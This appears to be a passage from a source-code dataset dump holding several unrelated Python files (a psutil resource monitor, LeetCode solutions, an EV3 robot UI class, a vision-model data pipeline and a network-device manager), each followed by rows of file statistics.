memory_info = {'total': 0, 'available': 0,
'percent': 0, 'used': 0, 'free': 0}
disk_id = []
disk_total = []
disk_used = []
disk_free = []
disk_percent = []
# get cpu information
def get_cpu_info():
cpu_times = psutil.cpu_times()
cpu_info['user'] = cpu_times.user
cpu_info['system'] = cpu_times.system
cpu_info['idle'] = cpu_times.idle
cpu_info['percent'] = psutil.cpu_percent(interval=2)
# get memory information
def get_memory_info():
mem_info = psutil.virtual_memory()
memory_info['total'] = mem_info.total
memory_info['available'] = mem_info.available
memory_info['percent'] = mem_info.percent
memory_info['used'] = mem_info.used
memory_info['free'] = mem_info.free
def get_disk_info():
for id in psutil.disk_partitions():
if 'cdrom' in id.opts or id.fstype == '':
continue
disk_name = id.device.split(':')
s = disk_name[0]
disk_id.append(s)
disk_info = psutil.disk_usage(id.device)
disk_total.append(disk_info.total)
disk_used.append(disk_info.used)
disk_free.append(disk_info.free)
disk_percent.append(disk_info.percent)
if __name__ == '__main__':
get_cpu_info()
cpu_status = cpu_info['percent']
print('cpu usage is:%s%%' % cpu_status)
get_memory_info()
mem_status = memory_info['percent']
print('memory usage is:%s%%' % mem_status)
get_disk_info()
for i in range(len(disk_id)):
        print('%s disk usage is:%s%%' % (disk_id[i], disk_percent[i]))
| 26.685714 | 75 | 0.646681 | 270 | 1,868 | 4.207407 | 0.288889 | 0.079225 | 0.049296 | 0.022887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02961 | 0.204497 | 1,868 | 69 | 76 | 27.072464 | 0.734859 | 0.14561 | 0 | 0 | 0 | 0 | 0.116352 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.022727 | 0 | 0.090909 | 0.068182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a5924218bd91ec5cd3a910146334e0e5acd39d37 | 1,592 | py | Python | SS/p202.py | MTandHJ/leetcode | f3832ed255d259cb881666ec8bd3de090d34e883 | ["MIT"] | null | null | null | SS/p202.py | MTandHJ/leetcode | f3832ed255d259cb881666ec8bd3de090d34e883 | ["MIT"] | null | null | null | SS/p202.py | MTandHJ/leetcode | f3832ed255d259cb881666ec8bd3de090d34e883 | ["MIT"] | null | null | null |
"""
็ผๅไธไธช็ฎๆณๆฅๅคๆญไธไธชๆฐ n ๆฏไธๆฏๅฟซไนๆฐใ
ใๅฟซไนๆฐใๅฎไนไธบ๏ผ
ๅฏนไบไธไธชๆญฃๆดๆฐ๏ผๆฏไธๆฌกๅฐ่ฏฅๆฐๆฟๆขไธบๅฎๆฏไธชไฝ็ฝฎไธ็ๆฐๅญ็ๅนณๆนๅใ
็ถๅ้ๅค่ฟไธช่ฟ็จ็ดๅฐ่ฟไธชๆฐๅไธบ 1๏ผไนๅฏ่ฝๆฏ ๆ ้ๅพช็ฏ ไฝๅง็ปๅไธๅฐ 1ใ
ๅฆๆ ๅฏไปฅๅไธบย 1๏ผ้ฃไน่ฟไธชๆฐๅฐฑๆฏๅฟซไนๆฐใ
ๅฆๆ n ๆฏๅฟซไนๆฐๅฐฑ่ฟๅ true ๏ผไธๆฏ๏ผๅ่ฟๅ false ใ
ๆฅๆบ๏ผๅๆฃ๏ผLeetCode๏ผ
้พๆฅ๏ผhttps://leetcode-cn.com/problems/happy-number
่ไฝๆๅฝ้ขๆฃ็ฝ็ปๆๆใๅไธ่ฝฌ่ฝฝ่ฏท่็ณปๅฎๆนๆๆ๏ผ้ๅไธ่ฝฌ่ฝฝ่ฏทๆณจๆๅบๅคใ
"""
from typing import List
class Solution:
def isHappy(self, n: int) -> bool:
        # First collect the individual digits of the number
LIMIT = 1000
nums = list(map(int, list(str(n))))
cnt = 0
# res = n
res = self.square_sum(nums)
while cnt < LIMIT:
if res == 1:
return True
else:
nums = list(map(int, list(str(res))))
res = self.square_sum(nums)
cnt += 1
return False
def square_sum(self, nums:List[int]) -> int:
def my_pow(x):
return x ** 2
return sum(list(map(my_pow, nums)))
# Hash table approach
class Solution:
def isHappy(self, n: int) -> bool:
        # Create an initial hash set to store the values we have already seen
res_sum = set()
        # Define a helper that returns the sum of squared digits after one round
def getNext(n: int) -> int:
res_sum = 0
            # Peel off digits while any remain
while n > 0:
n, digit = divmod(n, 10)
res_sum += digit ** 2
return res_sum
        # Update n each round and check for a cycle:
        # if the new value has appeared in res_sum before (and is not 1),
        # the sequence has entered a loop it can never escape
while n != 1:
n = getNext(n)
if n in res_sum:
return False
res_sum.add(n)
return True
# for test
if __name__ == "__main__":
ins = Solution()
n = 19
print(ins.isHappy(n))
| 21.808219 | 53 | 0.523241 | 194 | 1,592 | 4.190722 | 0.458763 | 0.04428 | 0.03936 | 0.056581 | 0.186962 | 0.137761 | 0.086101 | 0.086101 | 0 | 0 | 0 | 0.01996 | 0.370603 | 1,592 | 72 | 54 | 22.111111 | 0.791417 | 0.251884 | 0 | 0.263158 | 0 | 0 | 0.006814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.026316 | 0.026316 | 0.394737 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a5964514746ca9cd43f5272151dd592b02ad5040 | 2,309 | py | Python | UI/UIObject.py | R2D2Hud/CharlieOSX | 37c4edb0b31eda8082acd8e31afc3dc85fd75abe | ["MIT"] | 12 | 2020-04-11T13:10:14.000Z | 2022-03-24T09:12:54.000Z | UI/UIObject.py | R2D2Hud/CharlieOSX | 37c4edb0b31eda8082acd8e31afc3dc85fd75abe | ["MIT"] | 14 | 2020-01-24T14:07:45.000Z | 2020-12-20T19:14:04.000Z | UI/UIObject.py | R2D2Hud/CharlieOSX | 37c4edb0b31eda8082acd8e31afc3dc85fd75abe | ["MIT"] | 11 | 2020-06-19T20:12:43.000Z | 2021-04-25T05:02:20.000Z |
from profileHelper import ProfileHelper
from pybricks.parameters import Button, Color
from pybricks.media.ev3dev import Image, ImageFile, Font, SoundFile
from pybricks.hubs import EV3Brick
from UI.tools import Box
class UIObject:
def __init__(self, name: str, brick: EV3Brick, bounds: Box, contentType, content, padding=(0, 0, False), font=Font(family='arial', size=11), visible=True):
# self.logger = logger
self.name = name
self.brick = brick
self.bounds = bounds
self.padding = padding
self.contentType = contentType
self.content = content
self.font = font
self.visibility = visible
self.radius = 0
self.selected = False
def getName(self):
return self.name
def setVisibility(self, visibility: bool):
self.visibility = visibility
def getVisibility(self):
return self.visibility
def update(self):
pass
def draw(self, selected=False):
if self.padding[2]:
x = self.padding[0]
y = self.padding[1]
else:
x = self.bounds.x + self.padding[0]
y = self.bounds.y + self.padding[1]
if self.visibility:
if self.contentType == 'img':
if self.selected:
self.radius = 5
else:
self.radius = 0
self.brick.screen.draw_image(x, y, self.content, transparent=Color.RED)
elif self.contentType == 'textBox':
self.brick.screen.set_font(self.font)
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=True, color=Color.WHITE)
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=False if not selected else True, color=Color.BLACK)
self.brick.screen.draw_text(self.bounds.x + 1, self.bounds.y + 1, self.content, text_color=Color.BLACK if not selected else Color.WHITE)
else:
if self.contentType == 'textBox':
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=True, color=Color.WHITE)
    def setClickAction(self, action):  # action: a zero-argument callable
self.clickAction = action
def click(self):
self.clickAction()
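# Usage sketch (hypothetical values; Box is assumed to expose x, y, width and
# height, matching the attribute accesses in draw() above):
#   brick = EV3Brick()
#   label = UIObject('title', brick, Box(0, 0, 60, 16), 'textBox', 'Hello')
#   label.draw()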
| 37.241935 | 159 | 0.603725 | 292 | 2,309 | 4.736301 | 0.260274 | 0.079537 | 0.065076 | 0.068691 | 0.232827 | 0.232827 | 0.164136 | 0.164136 | 0.164136 | 0.164136 | 0 | 0.011557 | 0.288003 | 2,309 | 61 | 160 | 37.852459 | 0.829684 | 0.019489 | 0 | 0.142857 | 0 | 0 | 0.00973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163265 | false | 0.020408 | 0.061224 | 0.040816 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a59648f6d46920ef327bbe7ce9659f9fe533785d | 9,558 | py | Python | factory.py | rosinality/vision-transformers-pytorch | b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f | ["MIT"] | 77 | 2021-04-03T06:44:19.000Z | 2021-07-07T07:05:01.000Z | factory.py | rosinality/vision-transformers-pytorch | b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f | ["MIT"] | 1 | 2021-04-08T06:59:41.000Z | 2021-04-08T11:20:32.000Z | factory.py | rosinality/vision-transformers-pytorch | b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f | ["MIT"] | 6 | 2021-04-15T13:36:37.000Z | 2022-02-03T12:32:20.000Z |
import os
from types import SimpleNamespace
import torch
from torch.utils.data import DataLoader
from torchvision import transforms
from PIL import Image
import numpy as np
from tensorfn import distributed as dist, nsml, get_logger
try:
from nvidia.dali.pipeline import Pipeline
from nvidia.dali import fn, types, pipeline_def
from nvidia.dali.plugin.pytorch import DALIClassificationIterator
except ImportError:
pass
from autoaugment import RandAugment
from dataset import LMDBDataset
from mix_dataset import MixDataset
from transforms import RandomErasing
def wd_skip_fn(skip_type):
def check_wd_skip_fn(name, param):
if skip_type == "nfnet":
return "bias" in name or "gain" in name
elif skip_type == "resnet":
return "bias" in name or "bn" in name or param.ndim == 1
elif skip_type == "vit":
return "bias" in name or "cls" in name or "norm" in name or param.ndim == 1
elif skip_type == "dino":
return "bias" in name or param.ndim == 1
return check_wd_skip_fn
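# Example (illustrative names): wd_skip_fn("vit") returns a predicate that
# excludes parameters from weight decay; it returns True for
# check("head.bias", p) or any 1-D parameter, and False for a 2-D weight
# such as check("blocks.0.attn.qkv.weight", p).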
def make_optimizer(train_conf, parameters):
lr = train_conf.base_lr * train_conf.dataloader.batch_size / 256
return train_conf.optimizer.make(parameters, lr=lr)
def make_scheduler(train_conf, optimizer, epoch_len):
warmup = train_conf.scheduler.warmup * epoch_len
n_iter = epoch_len * train_conf.epoch
lr = train_conf.base_lr * train_conf.dataloader.batch_size / 256
if train_conf.scheduler.type == "exp_epoch":
return train_conf.scheduler.make(
optimizer, epoch_len, lr=lr, max_iter=train_conf.epoch, warmup=warmup
)
else:
return train_conf.scheduler.make(optimizer, lr=lr, n_iter=n_iter, warmup=warmup)
def repeated_sampler(sampler):
epoch = 0
while True:
for i in sampler:
yield i
epoch += 1
sampler.set_epoch(epoch)
class ExternalSource:
def __init__(self, dataset, batch_size, shuffle, distributed):
self.dataset = dataset
self.batch_size = batch_size
self.sampler = dist.data_sampler(dataset, shuffle=True, distributed=distributed)
def __iter__(self):
self.generator = repeated_sampler(self.sampler)
return self
def __next__(self):
images, labels = [], []
for _ in range(self.batch_size):
img, label = self.dataset[next(self.generator)]
images.append(np.frombuffer(img, dtype=np.uint8))
labels.append(label)
return images, torch.tensor(labels, dtype=torch.int64)
# @pipeline_def
def dali_pipeline(source, image_size, training, cpu=False):
images, labels = fn.external_source(source=source, num_outputs=2)
if cpu:
device = "cpu"
images = fn.decoders.image(images, device=device)
else:
device = "gpu"
images = fn.decoders.image(
images,
device="mixed",
device_memory_padding=211025920,
host_memory_padding=140544512,
)
if training:
images = fn.random_resized_crop(
images,
device=device,
size=image_size,
interp_type=types.DALIInterpType.INTERP_CUBIC,
)
coin = fn.random.coin_flip(0.5)
images = fn.flip(images, horizontal=coin)
else:
pass
return images, labels
class DALIWrapper:
def __init__(self, pipeline):
self.dataloader = DALIClassificationIterator(pipeline)
def __iter__(self):
self.iterator = iter(self.dataloader)
return self
    def __next__(self):
        data = next(self.iterator)
        image = data[0]["data"]
        label = data[0]["label"]
        return image, label
def make_dali_dataloader(
path, train_size, valid_size, train_set, valid_set, batch, distributed, n_worker
):
pass
def make_augment_dataset(path, train_transform, valid_transform):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
train_set = LMDBDataset(train_dir, train_transform)
valid_set = LMDBDataset(valid_dir, valid_transform)
return train_set, valid_set
def make_dataset(
path, train_size, valid_size, randaug_params, mix_params, erasing, verbose=True
):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
transform_list = [
transforms.RandomResizedCrop(train_size, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
RandAugment(**randaug_params),
transforms.ToTensor(),
normalize,
]
if erasing > 0:
transform_list += [
RandomErasing(
erasing, mode="pixel", max_count=1, num_splits=0, device="cpu"
)
]
if mix_params["mix_before_aug"]:
preprocess = transform_list[:2]
postprocess = transform_list[2:]
else:
preprocess = transform_list
postprocess = []
if verbose:
logger = get_logger()
log = f"""Transforms
Transform before Mixes:
{preprocess}
Mixes: mixup={mix_params["mixup"]}, cutmix={mix_params["cutmix"]}"""
if mix_params["mix_before_aug"]:
log += f"""
Transform after Mixes:
{postprocess}"""
logger.info(log)
train_preprocess = transforms.Compose(preprocess)
train_postprocess = transforms.Compose(postprocess)
train_set = LMDBDataset(train_dir, train_preprocess)
train_set = MixDataset(
train_set, train_postprocess, mix_params["mixup"], mix_params["cutmix"]
)
valid_preprocess = transforms.Compose(
[
transforms.Resize(valid_size + 32, interpolation=Image.BICUBIC),
transforms.CenterCrop(valid_size),
transforms.ToTensor(),
normalize,
]
)
valid_set = LMDBDataset(valid_dir, valid_preprocess)
return train_set, valid_set
def make_dataset_cuda(path, train_size, valid_size, randaug_params, mixup, cutmix):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
train_preprocess = transforms.Compose(
[
transforms.RandomResizedCrop(train_size, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
]
)
train_postprocess = transforms.Compose(
[RandAugment(**randaug_params), transforms.ToTensor(), normalize]
)
train_set = LMDBDataset(train_dir, train_preprocess)
train_set = MixDataset(train_set, train_postprocess, mixup, cutmix)
valid_preprocess = transforms.Compose(
[
transforms.Resize(valid_size + 32, interpolation=Image.BICUBIC),
transforms.CenterCrop(valid_size),
transforms.ToTensor(),
normalize,
]
)
valid_set = LMDBDataset(valid_dir, valid_preprocess)
return train_set, valid_set
def make_dataloader(train_set, valid_set, batch, distributed, n_worker):
batch_size = batch // dist.get_world_size()
train_sampler = dist.data_sampler(train_set, shuffle=True, distributed=distributed)
train_loader = DataLoader(
train_set, batch_size=batch_size, sampler=train_sampler, num_workers=n_worker
)
valid_loader = DataLoader(
valid_set,
batch_size=batch_size,
sampler=dist.data_sampler(valid_set, shuffle=False, distributed=distributed),
num_workers=n_worker,
)
return train_loader, valid_loader, train_sampler
def lerp(start, end, stage, max_stage):
return start + (end - start) * (stage / (max_stage - 1))
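# Worked example: with train_sizes=(128, 224) and max_stage=4, lerp gives the
# per-stage training resolution 128, 160, 192, 224 for stages 0..3.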
def progressive_adaptive_regularization(
stage,
max_stage,
train_sizes,
valid_sizes,
randaug_layers,
randaug_magnitudes,
mixups,
cutmixes,
dropouts,
drop_paths,
verbose=True,
):
train_size = int(lerp(*train_sizes, stage, max_stage))
valid_size = int(lerp(*valid_sizes, stage, max_stage))
randaug_layer = int(lerp(*randaug_layers, stage, max_stage))
randaug_magnitude = lerp(*randaug_magnitudes, stage, max_stage)
mixup = lerp(*mixups, stage, max_stage)
cutmix = lerp(*cutmixes, stage, max_stage)
dropout = lerp(*dropouts, stage, max_stage)
drop_path = lerp(*drop_paths, stage, max_stage)
if verbose:
logger = get_logger()
log = f"""Progressive Training with Adaptive Regularization
Stage: {stage + 1} / {max_stage}
Image Size: train={train_size}, valid={valid_size}
RandAugment: n_augment={randaug_layer}, magnitude={randaug_magnitude}
Mixup: {mixup}, Cutmix: {cutmix}, Dropout={dropout}, DropPath={drop_path}"""
logger.info(log)
return SimpleNamespace(
train_size=train_size,
valid_size=valid_size,
randaug_layer=randaug_layer,
randaug_magnitude=randaug_magnitude,
mixup=mixup,
cutmix=cutmix,
dropout=dropout,
drop_path=drop_path,
)
| 29.319018 | 89 | 0.643022 | 1,110 | 9,558 | 5.301802 | 0.188288 | 0.019031 | 0.024299 | 0.013254 | 0.383517 | 0.361767 | 0.28938 | 0.267969 | 0.247409 | 0.185557 | 0 | 0.0136 | 0.261456 | 9,558 | 325 | 90 | 29.409231 | 0.820088 | 0.00136 | 0 | 0.25 | 0 | 0 | 0.066175 | 0.01215 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077869 | false | 0.012295 | 0.065574 | 0.004098 | 0.22541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a596a50f47d0ab9d4cfb1eb2e63d7c4e56340474 | 1,137 | py | Python | Easy/1207.UniqueNumberofOccurrences.py | YuriSpiridonov/LeetCode | 2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781 | ["MIT"] | 39 | 2020-07-04T11:15:13.000Z | 2022-02-04T22:33:42.000Z | Easy/1207.UniqueNumberofOccurrences.py | YuriSpiridonov/LeetCode | 2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781 | ["MIT"] | 1 | 2020-07-15T11:53:37.000Z | 2020-07-15T11:53:37.000Z | Easy/1207.UniqueNumberofOccurrences.py | YuriSpiridonov/LeetCode | 2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781 | ["MIT"] | 20 | 2020-07-14T19:12:53.000Z | 2022-03-02T06:28:17.000Z |
"""
Given an array of integers arr, write a function that returns true if and
only if the number of occurrences of each value in the array is unique.
Example:
Input: arr = [1,2,2,1,1,3]
Output: true
Explanation: The value 1 has 3 occurrences, 2 has 2 and 3 has 1. No two
values have the same number of occurrences.
Example:
Input: arr = [1,2]
Output: false
Example:
Input: arr = [-3,0,1,-3,1,1,1,-3,10,0]
Output: true
Constraints:
- 1 <= arr.length <= 1000
- -1000 <= arr[i] <= 1000
"""
#Difficulty: Easy
#63 / 63 test cases passed.
#Runtime: 48 ms
#Memory Usage: 13.8 MB
#Runtime: 48 ms, faster than 39.33% of Python3 online submissions for Unique Number of Occurrences.
#Memory Usage: 13.8 MB, less than 92.46% of Python3 online submissions for Unique Number of Occurrences.
from typing import List

class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
digits = {}
for d in arr:
if d not in digits:
digits[d] = 0
digits[d] += 1
return len(digits.keys()) == len(set(digits.values()))
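# Example: Solution().uniqueOccurrences([1, 2, 2, 1, 1, 3]) -> True, while
# Solution().uniqueOccurrences([1, 2]) -> False (both values occur once).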
| 29.153846 | 104 | 0.60774 | 175 | 1,137 | 3.948571 | 0.474286 | 0.04631 | 0.109986 | 0.04631 | 0.251809 | 0.156295 | 0.156295 | 0.156295 | 0.156295 | 0 | 0 | 0.078721 | 0.28496 | 1,137 | 38 | 105 | 29.921053 | 0.771218 | 0.689534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a598b26fe309d9bc4db6c62f8d0ba413c791f7b0 | 9,360 | py | Python | Playground3/src/playground/network/devices/pnms/PNMSDevice.py | kandarpck/networksecurity2018 | dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626 | ["MIT"] | 3 | 2018-10-25T16:03:53.000Z | 2019-06-13T15:24:41.000Z | Playground3/src/playground/network/devices/pnms/PNMSDevice.py | kandarpck/networksecurity2018 | dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626 | ["MIT"] | null | null | null | Playground3/src/playground/network/devices/pnms/PNMSDevice.py | kandarpck/networksecurity2018 | dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626 | ["MIT"] | null | null | null |
from playground.common.os import isPidAlive
from playground.common import CustomConstant as Constant
from .NetworkManager import NetworkManager, ConnectionDeviceAPI, RoutesDeviceAPI
import os, signal, time
class PNMSDeviceLoader(type):
"""
    This metaclass for PNMS device types auto-loads concrete device types
into the system.
"""
@classmethod
def loadPnmsDefinitions(cls, newClass):
if newClass.REGISTER_DEVICE_TYPE_NAME:
if newClass.REGISTER_DEVICE_TYPE_NAME in NetworkManager.REGISTERED_DEVICE_TYPES:
raise Exception("Duplicate Device Type Registration")
NetworkManager.REGISTERED_DEVICE_TYPES[newClass.REGISTER_DEVICE_TYPE_NAME] = newClass
for deviceType in newClass.CanConnectTo:
if not issubclass(deviceType, PNMSDevice):
raise Exception("Connect rules requires a subclass of device type. Got {}".format(deviceType))
rule = (newClass, deviceType)
if not ConnectionDeviceAPI.ConnectionPermitted(newClass, deviceType):
ConnectionDeviceAPI.PERMITTED_CONNECTION_TYPES.append(rule)
if newClass.CanRoute:
if not RoutesDeviceAPI.PermitsRouting(newClass):
RoutesDeviceAPI.PERMITTED_ROUTING_TYPES.append(newClass)
def __new__(cls, name, parents, dict):
definitionCls = super().__new__(cls, name, parents, dict)
cls.loadPnmsDefinitions(definitionCls)
return definitionCls
class PNMSDevice(metaclass=PNMSDeviceLoader):
CONFIG_TRUE = "true"
CONFIG_FALSE = "false"
CONFIG_OPTION_AUTO = "auto_enable"
"""
Sub classes that need access to the Connection section or
Routing section need to override these values
"""
CanConnectTo = []
CanRoute = False
STATUS_DISABLED = Constant(strValue="Disabled", boolValue=False)
STATUS_WAITING_FOR_DEPENDENCIES = Constant(strValue="Waiting", boolValue=False)
STATUS_ABNORMAL_SHUTDOWN = Constant(strValue="Abnormal Shutdown", boolValue=False)
STATUS_ENABLED = Constant(strValue="Enabled", boolValue=True)
    REGISTER_DEVICE_TYPE_NAME = None # All abstract classes should leave this None. All concrete classes must specify it.
def __init__(self, deviceName):
self._pnms = None
self._config = None
self._name = deviceName
self._deviceDependencies = set([])
# the status is the current status
self._enableStatus = self.STATUS_DISABLED
# the toggle is if there has been a request to go from one state to the other
self._enableToggle = False
def _cleanupFiles(self):
if not self._enableStatus:
runFiles = self._getDeviceRunFiles()
for file in runFiles:
if os.path.exists(file):
os.unlink(file)
def _reloadRuntimeData(self):
pass
def installToNetwork(self, pnms, mySection):
self._pnms = pnms
self._config = mySection
self._reloadRuntimeData()
# call self.enabled to correctly set enableStatus
# cannot call in constructor, requires self._pnms
self._runEnableStatusStateMachine()
def networkManager(self):
return self._pnms
def _sanitizeVerb(self, verb):
return verb.strip().lower()
def name(self):
return self._name
def dependenciesEnabled(self):
for device in self._deviceDependencies:
if not device.enabled(): return False
return True
def isAutoEnabled(self):
return self._config.get(self.CONFIG_OPTION_AUTO, self.CONFIG_FALSE) == self.CONFIG_TRUE
def pnmsAlert(self, device, alert, alertArgs):
if device in self._deviceDependencies:
if alert == device.enabled:
self._runEnableStatusStateMachine()
def initialize(self, args):
pass
def destroy(self):
pass
def enable(self):
if not self.enabled():
self._enableToggle = True
self._runEnableStatusStateMachine()
def disable(self):
if self.enabled():
self._enableToggle = True
self._runEnableStatusStateMachine()
def enabled(self):
self._cleanupFiles()
return self._enableStatus
def getPid(self):
statusFile, pidFile, lockFile = self._getDeviceRunFiles()
if os.path.exists(pidFile):
with open(pidFile) as f:
return int(f.read().strip())
return None
def config(self, verb, args):
pass
def query(self, verb, args):
return None
def _getDeviceRunFiles(self):
statusFile = os.path.join(self._pnms.location(), "device_{}.status".format(self.name()))
pidFile = os.path.join(self._pnms.location(), "device_{}.pid".format(self.name()))
lockFile = os.path.join(self._pnms.location(), "device_{}.pid.lock".format(self.name()))
return statusFile, pidFile, lockFile
def _running(self):
for requiredFile in self._getDeviceRunFiles():
if not os.path.exists(requiredFile):
return False
pid = self.getPid()
return pid and isPidAlive(pid)
def _runEnableStatusStateMachine(self):
newStatus = self._enableStatus
        # TODO: I wrote this function in a 'haze', thinking the manager keeps running.
        # But, of course, it shuts down after run, so there will be no callback.
        # Leaving this code in anyway: a working callback system may exist in the
        # future. For now, try to activate everything.
if not self._enableStatus and self._enableToggle:
for device in self._deviceDependencies:
if not device.enabled():
device.enable()
if self._enableStatus in [self.STATUS_DISABLED, self.STATUS_ABNORMAL_SHUTDOWN]:
if self._running():
# We might have gotten here because of a restart
# or a toggle.
if self.dependenciesEnabled():
newStatus = self.STATUS_ENABLED
else:
# oops. A dependency has shut down.
# Assume this device was supposed to be enabled.
self._shutdown()
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
elif self._enableToggle:
if self.dependenciesEnabled():
self._launch()
if self._running():
newStatus = self.STATUS_ENABLED
else:
newStatus = self.STATUS_ABNORMAL_SHUTDOWN
else:
newStatus = self.STATUS_DISABLED
elif self._enableStatus == self.STATUS_WAITING_FOR_DEPENDENCIES:
if self._enableToggle:
# we were trying to turn on, were waiting for deps, but now stop
newStatus = self.STATUS_DISABLED
elif self.dependenciesEnabled():
self._launch()
if self._running():
newStatus = self.STATUS_ENABLED
else:
newStatus = self.STATUS_ABNORMAL_SHUTDOWN
else:
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
elif self._enableStatus == self.STATUS_ENABLED:
if self._enableToggle:
self._shutdown()
newStatus = self.STATUS_DISABLED
elif not self._running():
newStatus = self.STATUS_DISABLED
elif not self.dependenciesEnabled():
self._shutdown()
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
else:
newStatus = self.STATUS_ENABLED
        alert = (self._enableStatus != newStatus)
        self._enableStatus = newStatus
        self._enableToggle = False
        if alert:
            # pnmsAlert() in listeners compares the alert against device.enabled,
            # so post the enabled method, and only when the status actually changed
            self._pnms.postAlert(self.enabled, self._enableStatus)
def _shutdown(self, timeout=5):
pid = self.getPid()
if pid:
os.kill(pid, signal.SIGTERM)
sleepCount = timeout
while isPidAlive(pid) and sleepCount > 0:
time.sleep(1)
sleepCount = sleepCount-1
if isPidAlive(pid):
raise Exception("Could not shut down device {}. (pid={})".format(self.name(), pid))
for file in self._getDeviceRunFiles():
if os.path.exists(file):
os.unlink(file)
def _launch(self, timeout=30):
pass
def _waitUntilRunning(self, timeout=30):
sleepCount = timeout
while not self._running() and sleepCount > 0:
time.sleep(1)
sleepCount = sleepCount - 1
return self._running()
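The metaclass registration above means a concrete device only needs to declare its class-level attributes. A minimal hypothetical subclass, sketched here for illustration (the name and behavior are not part of Playground3), would be picked up automatically:

class ExampleSwitch(PNMSDevice):
    # Hypothetical device type; setting this name is what makes the
    # PNMSDeviceLoader metaclass add the class to NetworkManager.REGISTERED_DEVICE_TYPES.
    REGISTER_DEVICE_TYPE_NAME = "example_switch"
    CanConnectTo = []   # could list other PNMSDevice subclasses to permit connections
    CanRoute = False

    def _launch(self, timeout=30):
        # A real device would spawn its process here and write the run files
        # returned by _getDeviceRunFiles(); omitted in this sketch.
        pass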
| 39.327731
| 119
| 0.583761
| 912
| 9,360
| 5.83114
| 0.258772
| 0.033847
| 0.046446
| 0.026326
| 0.263445
| 0.215307
| 0.183904
| 0.163595
| 0.098909
| 0.050395
| 0
| 0.001789
| 0.343056
| 9,360
| 238
| 120
| 39.327731
| 0.863067
| 0.094017
| 0
| 0.340909
| 0
| 0
| 0.029059
| 0
| 0
| 0
| 0
| 0.004202
| 0
| 1
| 0.147727
| false
| 0.028409
| 0.022727
| 0.028409
| 0.318182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a59a37e3de5885e67c006743f177528505c3b6da
| 3,315
|
py
|
Python
|
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | null | null | null |
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | null | null | null |
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | 1
|
2022-01-26T09:54:41.000Z
|
